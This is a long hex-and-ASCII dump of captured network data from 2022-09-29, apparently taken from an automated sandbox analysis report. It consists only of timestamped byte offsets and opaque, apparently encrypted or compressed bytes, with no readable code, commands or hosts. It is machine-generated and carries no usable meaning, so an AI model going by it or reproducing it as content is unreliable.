                                                                                                                                                            Data Ascii: F)a[7U!o(m#phJ8/_utRBey(mydQCtT*YCF9Jyp`u:7_za1_H@7KxX*{>=\rBpoU.)_pR<r'i?&f-.tALC*RYg@^a1ix@,`qwChds
                                                                                                                                                            2022-09-29 12:45:19 UTC27908INData Raw: 0f e3 c6 73 aa 74 30 95 19 27 f9 bc de 43 82 29 ba 50 aa fb 52 7b 00 2c 7c 69 17 a8 09 b9 77 43 f9 45 2f bf a1 9b d0 58 b5 84 00 57 9f c2 0a 6f 72 ae 79 04 47 0c 92 0a 78 90 81 c2 9f 82 ec 02 14 b5 4c 80 f3 6b eb ca ca ef 09 c0 c3 da 39 ce 6a 43 5e ad 0d 3d a2 cd a9 b6 5b c7 ed fb fa 63 23 03 1b 3d 63 af 7a c6 1c a0 46 8a e5 b9 9b e7 aa 85 16 75 09 55 b2 79 87 84 4b fe 63 c7 8a f3 4f 67 ce 0a b4 71 b1 ac ae ef 2a 27 9e ee 04 08 7e e5 3a 06 f8 7a 09 26 75 b7 31 1f b2 16 13 3b 1a a4 2e 7e d0 d1 25 59 cf 66 26 92 a7 4d 2b 3f 3b ae a4 8c e0 da 79 06 43 d5 e7 8a a2 b9 e2 08 da 93 3b 6a cf 7e ae e0 73 7a d3 88 74 43 d6 4c 4c a3 d5 93 71 c7 53 5d fb e9 94 44 0d a1 94 38 a8 1c 38 78 c6 e0 65 98 2e 78 f9 e5 3b d7 17 0b 07 02 84 94 4f 90 81 69 21 a8 a2 06 e7 81 9c
                                                                                                                                                            Data Ascii: st0'C)PR{,|iwCE/XWoryGxLk9jC^=[c#=czFuUyKcOgq*'~:z&u1;.~%Yf&M+?;yC;j~sztCLLqS]D88xe.x;Oi!
                                                                                                                                                            2022-09-29 12:45:19 UTC27924INData Raw: e1 b0 70 6d b4 60 93 16 72 4d 4f d3 85 65 9f 07 96 57 b5 c3 af 91 78 a3 b4 eb 90 60 e9 82 d1 d4 c6 68 07 da b6 48 0e eb d5 b0 a0 61 95 46 a1 29 d6 d0 b8 d8 b9 80 dd d9 d4 ae 77 6c 30 a8 6a 61 36 07 dd ae 3d 7d 83 a1 b4 2d f0 15 ef 84 01 26 14 59 bb 52 2d 3b 55 3e 5d 1e fd 26 fd e1 8b 38 47 16 e4 e5 de f8 e1 76 5d 47 d6 05 a0 af d9 16 b7 dd 44 45 02 82 a9 0e 6f 1c dd 30 bf 67 59 b9 a8 b7 76 67 9e 93 af ce 96 7c a9 ed 5c 28 75 8f 02 15 bf 56 c1 28 8d 2a 23 9e c5 2d 8c e4 d1 b8 fb 3c 12 13 82 7a cd 5f 65 0e 8a eb e7 cf 71 23 9e 02 b8 e2 e0 31 3c de 2e 83 21 8b 9d dc 90 9e eb 1f 60 ef 67 33 c1 66 de e6 c9 cb 26 b9 1a d1 60 c4 7c 46 13 37 4c 71 52 1c 1a 4d f0 1d d4 0a 94 e5 f9 cd 90 02 99 b2 07 63 8c 0e fc 74 21 15 0e ef d8 3c 4d 6e 26 39 3f 81 96 61 ac b1 f8
                                                                                                                                                            Data Ascii: pm`rMOeWx`hHaF)wl0ja6=}-&YR-;U>]&8Gv]GDEo0gYvg|\(uV(*#-<z_eq#1<.!`g3f&`|F7LqRMct!<Mn&9?a
                                                                                                                                                            2022-09-29 12:45:19 UTC27940INData Raw: 12 88 e9 b9 3c 77 eb 25 1a 49 29 8b a2 b0 c6 30 5b 56 30 81 d1 77 e8 71 b9 55 a0 a4 00 41 70 4f 05 7c 65 7e 1e af 5b 81 cd e2 f0 29 13 c8 42 65 31 5b ff ef 91 19 c6 c6 65 46 31 d4 6b a9 6b 75 1a 82 9a e9 6a 8c 72 a1 c2 58 8b 15 dc 20 d9 0e 4a 61 79 b6 1f d6 28 f1 c7 01 96 ca e5 5e 8a 81 cf 14 df 3c 06 92 b8 78 95 06 cf b5 c0 30 d7 19 90 e2 8a ae 9b 1a 88 32 0f 86 7e 81 2a 2a a8 a1 fc 75 3b 68 ff b3 93 ac 8c 60 16 c5 ff e5 07 a3 ed 69 2e 3b 5a ee 6e 7e f2 4e 64 14 53 49 e8 4b 57 51 84 49 8e 80 21 f6 65 d2 14 84 fc 2d 76 31 06 98 79 a5 65 57 84 c5 69 bb a4 b8 c0 d8 9c 57 59 da 9a c6 60 56 42 0a 63 d1 a5 90 0a 17 4d 6f 5a 1b 26 1c a2 a2 ca 17 eb 02 db 85 0e a4 88 56 da ec f3 65 3f d4 95 95 8d 98 d4 cd 41 98 a1 c3 b0 2e 73 f4 3d 25 07 9a f9 dd e8 5f 6c 20 55
                                                                                                                                                            Data Ascii: <w%I)0[V0wqUApO|e~[)Be1[eF1kkujrX Jay(^<x02~**u;h`i.;Zn~NdSIKWQI!e-v1yeWiWY`VBcMoZ&Ve?A.s=%_l U
                                                                                                                                                            2022-09-29 12:45:19 UTC27956INData Raw: e9 91 0a 00 4c 9b e2 6a a6 91 ef 15 25 dd c7 9f 50 79 93 eb 10 c4 8a bb 92 c8 d6 ca dc 50 e4 b6 a5 be 4b 99 9f 40 be 67 ab 80 cb ad 40 90 e0 86 ad c2 06 23 64 4d f0 dc 82 12 13 1f f1 51 3e 9d 37 c3 b4 4c 72 6f 54 d8 1e e3 2c e9 a5 63 6a 3e 5d ad d8 58 29 33 b3 99 e5 4b 19 5d 02 a0 78 0a 70 de c3 ac 5e ac 62 e6 45 15 0a 14 91 45 61 82 2b f9 a7 5e 56 1b ac d5 8b b2 96 c8 d8 a5 a5 91 db 98 96 47 ed ea 9e c5 07 bd fc 69 12 3c 20 ba 97 60 6d 06 33 bd 11 44 c2 fd 04 10 ee 44 d8 aa 4c c0 7a 97 6a 47 af f2 ce 2f bb b6 36 7e 04 f3 48 1d a5 63 74 09 07 be 5a d0 64 f7 54 a8 25 07 01 0a d6 7f c3 e4 f1 db 25 75 a3 b1 bc 6a 1d be 9d 85 72 55 17 94 82 09 11 98 db b5 04 6b 42 1b 4f 3a ba ce 9d 96 94 14 1d 0a 7b 3d 52 93 8a 74 7b 75 3b 3f f2 5f d6 7a 13 62 d5 bc 7b f1 ef
                                                                                                                                                            Data Ascii: Lj%PyPK@g@#dMQ>7LroT,cj>]X)3K]xp^bEEa+^VGi< `m3DDLzjG/6~HctZdT%%ujrUkBO:{=Rt{u;?_zb{
                                                                                                                                                            2022-09-29 12:45:19 UTC27972INData Raw: c2 a3 c0 7d a5 7f 3c e7 a2 38 64 e8 06 ae 18 a1 00 e0 43 d1 71 65 bb d5 07 87 61 33 04 64 8b 12 5e 24 8d f2 9e 52 98 b8 02 c1 de ef 21 a0 be 2b c2 89 c9 e6 9d 2c 91 e8 a2 b3 56 35 ca 6c 82 d8 cc bf 93 f8 7c d0 6d 52 83 24 42 dc ac ec f9 89 af cf e3 6e 6d 98 cc a7 24 2e 90 d9 2a 1c 74 b9 38 05 fb e6 cc 99 77 72 2d b5 0c 2c f6 01 da ee 6b 22 ae f4 30 2c f9 79 cd 56 99 33 2a 59 e7 20 d4 ad a6 e9 fb a8 d2 d7 9f 48 30 66 59 51 f6 a7 7f f3 01 e4 09 5c 44 6f a1 9a 33 dd 94 26 79 86 d6 30 1f cf ba 83 cd ee 4f 4f 3c cb 10 ec 49 3b 9f 32 d3 1b c0 6c 47 3c af e4 03 62 45 98 17 41 28 97 83 e8 cc 55 1d b1 6d 3f 74 c6 ad fb 3a 03 eb 6d ba 02 94 d5 cb 1a 1f 65 d0 ab 5a 33 74 05 96 9c 91 a9 f4 be b6 de 5a a4 53 1b 9a 6c 0b 0a 22 91 a4 be f4 ba 6a 71 e2 40 d9 e8 53 22 82
                                                                                                                                                            Data Ascii: }<8dCqea3d^$R!+,V5l|mR$Bnm$.*t8wr-,k"0,yV3*Y H0fYQ\Do3&y0OO<I;2lG<bEA(Um?t:meZ3tZSl"jq@S"
                                                                                                                                                            2022-09-29 12:45:19 UTC27988INData Raw: 67 a2 c5 9b da e7 eb d8 5d 2f 6c 4b 41 1e 49 9f ed 10 27 aa bc 20 f0 75 27 e4 de 1a d0 2d 61 a0 de 04 ea 4f 69 2f e3 f9 8e f0 8f e5 51 89 f4 cb 0d b1 1c 4c 66 97 3e c9 ea a3 cd ea 13 9d 72 60 e2 b2 c6 db 6e c5 af 58 3d 8d 33 a7 d3 61 ea 8c ba da 4e bb 18 e4 46 37 f1 42 28 1a 07 9d c7 8d c7 28 9f 8d 7d ca a3 55 af 93 74 0b ef 6e de f0 32 3c f7 58 77 5b 1e c1 27 f3 de e7 f4 8b d2 76 7d a9 b2 e8 5c e3 00 06 8c 1f a9 66 a2 9a 1e a7 fd 8d 5b 02 ea 92 9d 16 e8 75 fc 3d 2a 8e 42 49 47 08 f9 c0 7a d1 87 c6 33 70 c8 28 44 70 b2 2a 03 6f d7 50 d3 a3 55 5e 34 dc c1 97 d6 98 00 43 5e 63 7f d3 04 3f 5d a0 46 e8 37 00 91 ab 97 f0 e6 5b 75 86 6a a9 08 5e f6 8f bb 05 e6 9b 82 69 da f9 04 26 5b 55 44 ba a4 50 a4 e5 a2 c5 ab 1a c8 eb cf 75 99 fc 9d d2 06 fc b6 a4 7a 8a 54
                                                                                                                                                            Data Ascii: g]/lKAI' u'-aOi/QLf>r`nX=3aNF7B((}Utn2<Xw['v}\f[u=*BIGz3p(Dp*oPU^4C^c?]F7[uj^i&[UDPuzT
                                                                                                                                                            2022-09-29 12:45:19 UTC28004INData Raw: 0e 2c 6a 77 a3 2a ea 13 0c a8 27 c4 3c bb 98 97 36 e6 89 3b 7c 0a 84 f6 c1 32 c6 a4 94 cc 04 ac 71 3c 7f c5 b3 9f 98 b7 6a c5 5e 7c 57 4e e5 a7 eb e4 1e 49 df 5f 15 3a 10 4e 63 c2 48 c0 54 20 11 d1 b6 c7 1f 12 53 61 61 c1 42 8e f8 cd 9e 97 92 42 99 61 44 47 b3 2a 57 f3 e0 c9 76 05 67 d6 99 78 db 17 f0 15 08 33 45 44 d3 d1 a8 c0 7b a8 ea c3 f7 a0 df c2 c5 99 92 46 24 d8 70 8b c8 c3 d6 5f 7c 4e 77 96 54 49 d3 ab 62 cc a8 60 b0 8d c5 b0 f5 22 0b 71 99 83 ad 35 f9 fc ed 78 d8 1f d7 ff a1 a6 b8 1c 67 47 a4 2c 32 84 c2 4d b2 05 0d 61 e8 6b de ae a4 13 0c 7c a3 62 eb 79 4c 9e b7 fd ba 86 5d 1d a8 b3 97 fe d3 37 85 42 10 26 6c 7f 27 a3 9d 97 17 dc 3c fb 48 9b 4f 41 0b 1b b2 e3 30 6a 61 f8 37 79 c9 97 73 5b dc 32 29 a7 4f 14 94 ca e8 57 96 39 3b 87 11 9d 7c b4 df
                                                                                                                                                            Data Ascii: ,jw*'<6;|2q<j^|WNI_:NcHT SaaBBaDG*Wvgx3ED{F$p_|NwTIb`"q5xgG,2Mak|byL]7B&l'<HOA0ja7ys[2)OW9;|
                                                                                                                                                            2022-09-29 12:45:19 UTC28020INData Raw: 7f 02 16 0c c1 8e 9e 80 38 b6 8d 19 ef ab 20 cb 62 58 f1 0d 33 16 1f 92 f6 12 26 4f b8 dc 94 9b 34 eb d2 25 bc ae 8d 17 db 18 0d 44 db cd 73 6c 99 f5 f3 5c 3f f7 2a f2 90 d6 85 73 b8 d2 18 cf a9 92 00 0b 40 e5 e8 f2 1f e6 78 69 23 5b 7d 3f 4b 03 8a a4 22 a5 ba 65 bc 96 e2 e8 d2 93 94 1d be b9 5a a4 63 a2 89 9c 29 45 34 6c 02 f9 d6 fa b2 f9 ad 19 eb 08 a1 e3 08 15 cf 3c f0 81 42 8a e9 a7 52 8e dc 05 41 da c4 58 fd ea 0f cb 41 fe e3 6f fa 05 bd 80 7d 08 f9 bd ca 88 07 6f c8 50 84 51 2c ee 7e 86 b3 ef 11 80 76 40 8b 2b c3 07 00 f6 6d 3b 60 8a 80 b1 d7 2f af 72 49 68 54 ec 5b 14 c4 5e b0 6c 11 89 06 ec 8e 55 5d 41 1c 13 62 b5 98 1d 4f e0 f1 a0 81 61 12 df c2 85 61 5b ac 1b 5f d8 6c d1 e2 bd 33 9b 21 d3 54 36 52 28 5a 4e be 7b be cd 90 70 63 71 3e 5c b3 19 c6
                                                                                                                                                            Data Ascii: 8 bX3&O4%Dsl\?*s@xi#[}?K"eZc)E4l<BRAXAo}oPQ,~v@+m;`/rIhT[^lU]AbOaa[_l3!T6R(ZN{pcq>\
                                                                                                                                                            2022-09-29 12:45:19 UTC28036INData Raw: da f2 6b 8d 70 2c e5 6e dd 8b 7d 24 cb 24 d9 55 2e 11 6d fe 36 6f b3 b7 5c 2a fc 4d e5 ce e5 2c d2 b1 c7 cd ae 7b 3c 69 06 4a 04 4e 70 55 22 74 0c 92 23 8a 55 bf d1 89 7d 33 3f 50 c5 ed e2 bf 05 70 34 3e 74 c3 1c a5 88 98 59 68 9e bb b3 2f 54 c0 3c a6 81 74 21 eb 94 c7 14 ea 1b a9 0b 69 09 1a 59 b1 a9 ef 43 ce 78 df 60 1d fc bd a0 42 08 29 cf 9e 53 43 61 fb 03 a5 9e ab 61 e3 c4 d5 5d de 45 1c 9c c5 b1 b5 86 98 ab 14 90 80 c1 ff 27 00 3e 96 35 6e e5 1c 81 32 14 f6 f1 84 bd 6e 92 a7 c8 ba e4 ea d3 f4 18 16 cd f7 96 a1 60 82 c7 b4 81 f9 2a 35 c0 89 47 bc 4a 50 ee 04 3a 7a 40 76 e6 76 9a 83 f8 05 ac ed 12 3a 50 f5 ad ab d4 29 d6 08 36 1b 63 eb bc 7b b0 d9 2b 4b ea 99 8c 89 13 b4 13 1d 2f ea 0f 7d 7b 97 9c a3 4e 40 51 c9 a6 1a 7e 09 48 f2 67 06 04 06 57 95 cc
                                                                                                                                                            Data Ascii: kp,n}$$U.m6o\*M,{<iJNpU"t#U}3?Pp4>tYh/T<t!iYCx`B)SCaa]E'>5n2n`*5GJP:z@vv:P)6c{+K/}{N@Q~HgW
                                                                                                                                                            2022-09-29 12:45:19 UTC28052INData Raw: d8 bc 65 04 2a d6 e8 a0 85 a3 b9 0d 9d 03 57 12 9a 63 4d a5 47 03 49 e6 c9 fa 05 94 db 08 c4 03 54 d7 b9 15 c2 b4 73 d3 a1 6a c9 83 61 67 a2 49 9d 2c 38 ea 8a e0 80 04 4a 60 c3 ea 06 11 21 34 a4 4e 59 28 23 01 be 4a 61 1d d3 50 72 ad 82 40 d2 20 e6 25 8c 29 59 11 59 f2 7a 57 57 aa fb f9 4e 11 f4 74 8e f1 35 18 0c 73 67 3b 85 dc 34 6f 9a 83 a1 18 09 24 84 70 54 f3 6a 1f ad de dd df 21 32 0d 34 a7 81 2c 86 33 71 b3 d9 f5 3a 87 de 15 8c 22 97 90 8f b5 13 ec 2d f9 88 27 d9 20 f6 11 3a 36 3a 0a 71 9f 55 46 b6 f1 1f bd 05 6b d1 f2 54 75 d2 39 8c dd 79 4b 35 7a cb a5 75 54 87 b0 9c 0a b0 d2 75 fd 32 73 fb 5e 7f da a2 94 7a 93 4a 0e a7 68 dc d9 2c cd ae f7 02 8a 99 c5 d4 10 16 d8 27 60 72 49 73 3e df 1e 94 cf 09 6e fd ae 6e ad d0 ff ff 9c b4 85 50 a0 a3 91 dd 75
                                                                                                                                                            Data Ascii: e*WcMGITsjagI,8J`!4NY(#JaPr@ %)YYzWWNt5sg;4o$pTj!24,3q:"-' :6:qUFkTu9yK5zuTu2s^zJh,'`rIs>nnPu
                                                                                                                                                            2022-09-29 12:45:19 UTC28068INData Raw: 31 1b e9 84 5b d6 24 f4 7d da 7a 53 9b ac 24 ad 24 17 f6 b7 16 ee 37 28 78 52 28 70 46 86 60 b0 78 b1 e0 af 9f 92 12 2d 56 4a 1c 4a 38 83 87 50 e2 ca b6 52 77 ae 4d 41 43 fd 18 c5 dc 9d 31 8d b0 60 10 36 be 23 15 72 fa d3 38 2e 5c 51 1c ac 5e 4d 67 87 e0 2e f7 19 f7 06 dd f9 ed 19 01 01 09 b8 43 3b b1 42 82 22 b0 3f 08 8d 6b 4b de ec c4 e8 5e d1 5d 99 b4 a9 46 73 23 d0 df 9e b6 ec 0d ed bd 49 47 ed 03 b8 22 ba 7f 1d c9 a8 ad 1b 8c 89 9f d7 3e d9 a7 66 f4 b4 14 49 4b 3f d8 91 6d 5c ed 2b 08 7c 80 b4 fc f8 e3 1d d8 91 5f a7 79 a4 1f 70 1d 2c 3a d3 63 6a a5 2e 9c 8b df c4 74 72 6a 58 a6 61 51 25 02 ce 8d 18 6c e5 c6 ac ef c4 da 39 60 53 9e ba 7c aa 16 61 92 92 fd 3b 47 2c cc 66 52 88 13 21 f7 17 d7 e8 0c 12 42 ca a3 b8 0d ad d0 ca 2d 13 e6 b1 eb 0c b3 35 87
                                                                                                                                                            Data Ascii: 1[$}zS$$7(xR(pF`x-VJJ8PRwMAC1`6#r8.\Q^Mg.C;B"?kK^]Fs#IG">fIK?m\+|_yp,:cj.trjXaQ%l9`S|a;G,fR!B-5
                                                                                                                                                            2022-09-29 12:45:19 UTC28084INData Raw: 64 0f ed 14 40 f3 63 22 5e e1 63 e9 af 03 03 19 7c 4e e4 8d 46 80 40 7d 21 8c 00 08 23 e9 4c e0 95 9a 71 3a 56 2c c7 58 47 0e 5a c3 85 b3 53 c6 17 20 06 7c bd 39 8b 95 77 fa e2 a3 3f 61 64 07 37 98 d2 03 59 17 7e 53 50 d9 6e e2 a2 d3 83 14 02 e5 d8 7d c2 f8 c9 16 83 d1 de ea 00 66 36 5a 4d b8 5b ba 52 8e 02 4c b7 e4 34 74 d5 6c 19 87 8d 07 69 05 14 e9 d6 28 d9 1b 0e d0 cf bb f5 31 a6 d1 26 74 3e 4f 98 cf bd 36 ed 8a d7 61 96 f1 0d e4 fe 5a 68 48 36 e1 d5 27 40 99 8c ff d1 b5 74 08 ac f5 31 7e a8 81 6d 32 ae e4 9d 34 dc 11 1f 30 8f ba 44 a6 c5 6b ec 77 28 7f 44 16 7c e6 6d eb fa 61 ba 71 29 ab df 4a 48 88 2c 6e 21 01 9d 19 1b b9 16 01 3a 21 5f 3b 17 24 c6 4f 38 dc 8f 29 ff b2 5d e1 23 d6 bf 40 ad db 5a a7 98 91 6d 8b 46 e5 a7 64 f0 48 d8 d8 e5 2e a7 ba cb
                                                                                                                                                            Data Ascii: d@c"^c|NF@}!#Lq:V,XGZS |9w?ad7Y~SPn}f6ZM[RL4tli(1&t>O6aZhH6'@t1~m240Dkw(D|maq)JH,n!:!_;$O8)]#@ZmFdH.
                                                                                                                                                            2022-09-29 12:45:19 UTC28100INData Raw: c5 dc fe 14 aa e4 17 a7 77 a9 c7 60 e9 f7 2e 36 00 bf da 09 70 57 90 80 e1 f2 c1 79 86 dc f7 51 fd 12 54 39 50 0e ac 36 86 1e 28 14 5f ba 15 39 d5 c3 2c 9d b7 fb 2d 36 42 0e 6e 77 86 26 e9 72 bb 37 12 cf fa c3 92 47 87 d1 36 7d 7f 59 f5 68 92 70 b1 6b 3c a3 ce 5f 43 9f 9f 37 a3 cc dc d0 78 5b 11 ae f8 55 8e 95 5a 34 d5 66 fa 2f 99 33 25 92 56 2f 6f 3b 4b 11 ba 3b fd f4 ee d9 08 f1 f1 8e 11 dc 69 c0 bc f8 eb b2 6a ca 2d 86 10 eb 32 df 15 5b f2 87 cf 27 b3 26 82 bd 40 71 9d cc 39 21 7a d0 7c 26 c1 37 11 68 c4 d1 7c 67 6b 4e 65 8d da af 6b 33 bf c5 be 2b 8e 8c 77 19 49 81 0d 6a db e3 e8 ee cd a3 86 34 e1 28 f4 d5 5a 20 4d e8 0c f5 96 92 40 8a fa 02 01 78 0c e3 20 b0 ac cb da 42 73 d5 b5 20 3e 84 4a 44 0d 60 3c ed 28 bf b7 f7 13 c4 0d 1e c4 c6 44 f7 3a b1 18
                                                                                                                                                            Data Ascii: w`.6pWyQT9P6(_9,-6Bnw&r7G6}Yhpk<_C7x[UZ4f/3%V/o;K;ij-2['&@q9!z|&7h|gkNek3+wIj4(Z M@x Bs >JD`<(D:
                                                                                                                                                            2022-09-29 12:45:19 UTC28116INData Raw: 57 fd 7d 05 f1 0c 3e 8c c9 c3 dc c7 fa bf 53 5f f3 c0 ba 70 ee 21 e7 60 68 59 79 b3 02 ee b2 22 64 a8 1a 13 9a fa 1e b4 f2 31 0f b8 2d ce d4 f7 1c 15 bb c4 dd c6 65 a3 13 5b 96 23 60 46 b5 38 a9 f4 cb 51 d0 e1 79 8a db 8f 77 c9 14 90 26 1e 29 46 10 87 24 02 ce 17 66 58 85 57 c0 61 47 19 d5 79 6c 56 d9 b9 68 0d 26 f1 08 8b 39 86 46 3a 28 51 d8 1d 31 19 b4 8c 21 aa 33 10 a3 f7 30 1f 0e e2 9e 3e 71 bf f1 72 a2 d4 96 62 bd 14 a7 3f 3b 7d c1 8d 56 b0 40 15 e6 90 1a 79 24 18 b2 71 76 6c 2b 01 ec da 23 48 b4 b5 4d 53 0b ef d7 d9 2f 10 1c e4 4c 53 f0 73 ff 7e 3f b6 da 95 38 9e e5 dd 74 64 8d 46 52 1b 27 ed f4 72 cc 25 c3 f8 8b 90 95 7f 99 a3 09 bd 6c e5 12 84 59 85 61 45 14 45 3c b1 0d 00 36 d4 91 2f 35 d7 9a cd 58 b3 5e ad d0 ad 14 0e fe b5 4c bc a7 4f 56 b0 ac
                                                                                                                                                            Data Ascii: W}>S_p!`hYy"d1-e[#`F8Qyw&)F$fXWaGylVh&9F:(Q1!30>qrb?;}V@y$qvl+#HMS/LSs~?8tdFR'r%lYaEE<6/5X^LOV
                                                                                                                                                            2022-09-29 12:45:19 UTC28132INData Raw: 67 10 45 61 df e1 c8 56 94 ec 2d 10 46 ce 7a e9 d0 25 cc 48 d8 ca f6 0a 36 c6 f8 26 2f c1 f4 8d db b6 4a 05 e3 8d 2f c0 7d 98 2f 8a 68 33 bd e4 54 38 68 a2 09 1a 52 7f 38 19 94 2f 37 54 75 e3 2a f0 8d 2a 60 b8 d8 84 b5 cf 1c 35 17 a7 35 a2 79 06 4d ca 34 ce c2 33 09 e5 37 bc 1a bc 9b 17 55 06 b6 a3 be db 8d ff 46 09 33 dd 50 97 6e 19 a3 56 c4 0e 00 19 45 02 c1 b3 73 dd 57 d0 5f 55 fa 28 f1 70 f1 86 bf 1c c8 33 51 8a 43 86 ee fd b1 ad 4d b8 3b 23 4b 60 a0 95 fa e2 d8 ef 4d f0 c9 8a d0 0f fe ae 84 ed dc 5a 88 c2 c9 22 5e 61 82 b9 4c 9a ae b5 6b 41 0e 6c ab 8b 9e 97 87 30 c6 b8 e1 68 bb 63 23 23 42 ae 1a 45 e0 4c 20 ac c5 63 e1 4a 9a b6 64 b2 48 74 3b 6c 38 de 56 f7 d5 84 8a 25 fa 07 59 af fa df de 8c a3 9e 41 4f 9e a1 4b c2 38 11 93 0d 37 f9 5a ed fd cd a0
                                                                                                                                                            Data Ascii: gEaV-Fz%H6&/J/}/h3T8hR8/7Tu**`55yM437UF3PnVEsW_U(p3QCM;#K`MZ"^aLkAl0hc##BEL cJdHt;l8V%YAOK87Z
                                                                                                                                                            2022-09-29 12:45:19 UTC28148INData Raw: 71 72 66 b4 bb c2 a3 cc 69 16 d0 bd 8e 4b 13 a5 39 59 9b 5e 2a 61 13 95 01 5d 43 82 34 69 ca 61 ce 23 e2 dd 8c 86 bc 19 08 9f bb 64 5f 69 8d 4d 33 79 fb 1a f3 89 2c 71 a2 09 f4 ac 22 7d a2 f2 1b 75 76 61 b8 f9 ff de e6 cc 1d 64 d6 f1 fc fb 98 cf e1 82 6d 8d e2 c9 e7 cf 6a 64 ce 35 87 0a 8b 42 a0 89 97 a2 69 38 22 27 9c 68 17 90 04 15 06 f7 a6 07 eb 48 96 a8 73 00 1f 0e 31 fe 10 2f 60 77 58 3d 2a 5e f5 a2 cb 39 42 a0 8f 00 aa c3 39 b3 31 b5 df 61 b6 41 69 3e e5 ff 0d 10 de 03 02 65 40 3e 32 71 b2 ea 12 b6 24 0f 63 68 29 b6 e8 f0 31 fb 53 be 6a 01 f7 60 98 e1 76 94 1e 93 e7 83 91 29 81 9f 06 26 ce 8b 45 20 87 9e 04 48 70 9d 9e e6 30 e6 ee b4 92 a1 c8 fc b9 c6 a2 16 63 97 f9 07 6f 17 13 08 02 18 48 72 39 be ff 11 35 d9 83 49 1b 44 4f 88 21 8e 99 bd a3 8d af
                                                                                                                                                            Data Ascii: qrfiK9Y^*a]C4ia#d_iM3y,q"}uvadmjd5Bi8"'hHs1/`wX=*^9B91aAi>e@>2q$ch)1Sj`v)&E Hp0coHr95IDO!
                                                                                                                                                            2022-09-29 12:45:19 UTC28164INData Raw: 0b 18 32 e0 b7 1f e7 f1 63 69 e9 e0 e6 63 b2 b9 65 fc a9 16 29 55 ec 8c 04 69 62 66 1b 37 77 be 71 b4 29 8e 79 35 1d ea 19 13 43 af 34 8f 0d bf 57 72 06 20 fc a1 ca 70 84 22 34 7b 71 e2 69 8f 44 5d dc 79 70 e2 64 aa 87 b1 17 35 ac d0 ba bb 1f eb c6 cb 8f 09 da b8 97 32 33 8b 3c fb 1c fa c5 8a 5e 87 98 63 d3 36 bb 8d cf 69 6b c3 bf fc 62 65 14 3b 77 f7 6e 5f a3 47 fe ce 78 bd ae 42 ea 00 a9 71 c3 56 9f 2f d5 a9 69 e5 e7 1a 3c 74 95 10 b6 06 b0 91 b0 26 92 40 21 2f ee f9 a2 0e 9e 12 5c c2 5b 27 7e 27 b2 36 f8 7c e7 69 dd 91 5d 3f b5 a1 f6 f5 62 c5 8c fd bb f3 cd 3d 2f 0e 04 c2 8c 48 73 cd 2f 33 7c 83 86 24 21 d8 89 69 a8 49 49 75 0b 42 67 b3 5e ca 7e e6 8c bf 0d 0e fd 68 b9 2d 9b c5 dd 79 c1 f3 12 61 83 c1 77 71 28 94 42 a7 48 00 df 3c a8 29 bf c8 f8 80 ab
                                                                                                                                                            Data Ascii: 2cice)Uibf7wq)y5C4Wr p"4{qiD]ypd523<^c6ikbe;wn_GxBqV/i<t&@!/\['~'6|i]?b=/Hs/3|$!iIIuBg^~h-yawq(BH<)
                                                                                                                                                            2022-09-29 12:45:19 UTC28180INData Raw: b2 98 21 46 90 3d bf e5 75 d1 e5 d4 da 9b 5e a1 c7 d7 f3 69 60 68 f9 16 39 65 93 85 65 46 84 59 a9 90 6b d5 5a 1b 2d 83 b2 b3 0a 37 d6 89 6d 2e 35 eb 06 cf fa be b6 96 ba 2b 84 df 8e 72 f7 38 6c 63 a4 46 ff 83 53 1c 68 14 34 cb b3 af b6 7d 8e e3 8f ae 68 30 ce 25 20 70 a1 8e 02 62 c2 23 f9 e6 07 70 59 01 f0 b7 de 91 26 e1 e8 29 1e bb ed 43 b5 d5 4e 36 32 10 9c a0 ef 45 8c a4 47 1f d4 45 35 4a 10 e1 4c b2 fd fb be 1f 52 9a ad fb e6 64 3b 11 09 d3 0d 3f 05 6b bc 57 75 c4 45 55 bd 2d 15 27 56 1e 4f b3 74 3e c9 be 2b 0f 64 c0 4c ee 28 bd 6a 4a d3 20 9b d9 d3 a8 82 c8 23 bc 26 4d c9 0f 5d f2 30 16 42 66 f8 85 0c d4 70 ed 11 87 28 5b 2f 12 64 cd 70 56 06 6f d8 ee 47 2c fe 42 71 cb 5f 49 bf ce ce 54 b8 6e b0 a4 50 7a e1 fb 0f 64 66 52 e4 0a fe af 50 74 fa 2d ee
                                                                                                                                                            Data Ascii: !F=u^i`h9eeFYkZ-7m.5+r8lcFSh4}h0% pb#pY&)CN62EGE5JLRd;?kWuEU-'VOt>+dL(jJ #&M]0Bfp([/dpVoG,Bq_ITnPzdfRPt-
                                                                                                                                                            2022-09-29 12:45:19 UTC28196INData Raw: 69 b2 52 51 a4 7a c2 63 30 81 81 c9 8c dd 51 89 4f 68 a7 ce 58 1c 43 50 da c8 c7 72 5d 68 e8 39 72 a1 cb 14 72 58 26 4b 1e c8 7b 55 a1 5b 58 43 f2 88 1d 06 2a 7c c8 51 45 30 32 b9 31 22 61 74 40 30 c2 c2 2f 51 79 24 d5 92 f7 59 25 06 bf d0 53 2c da 0d ba 5a 72 f5 16 64 a8 7b c2 a8 90 a2 01 b5 98 3a 05 08 7b 99 b5 e3 59 f1 ee f7 34 bc 8e 7d 45 9a 20 eb 4b 18 97 af a8 fd 23 7c 38 ad dd 33 ca ef aa aa 5b ce a9 d0 7e 3f a7 6e 0c 68 63 d1 06 c8 e8 19 7a 9a 57 89 53 f8 9c e5 6d 57 78 d7 a4 08 58 b0 18 57 27 a5 9a 10 ce 4f 7f 64 fc ea c9 14 75 bd ec 60 8e 4b f9 d8 17 1d fa 53 fc c3 51 a0 c1 87 36 46 68 fc e9 8e 8f dc 31 fb b1 5a 52 e4 1b aa ab 62 c1 01 da 08 ab 6e 95 0c b7 ff dd fa 69 52 8b 30 97 d9 c7 14 57 9f 69 ce fb 5d 98 56 1b 43 99 a1 ee cb d3 02 d5 73 7e
                                                                                                                                                            Data Ascii: iRQzc0QOhXCPr]h9rrX&K{U[XC*|QE021"at@0/Qy$Y%S,Zrd{:{Y4}E K#|83[~?nhczWSmWxXW'Odu`KSQ6Fh1ZRbniR0Wi]VCs~
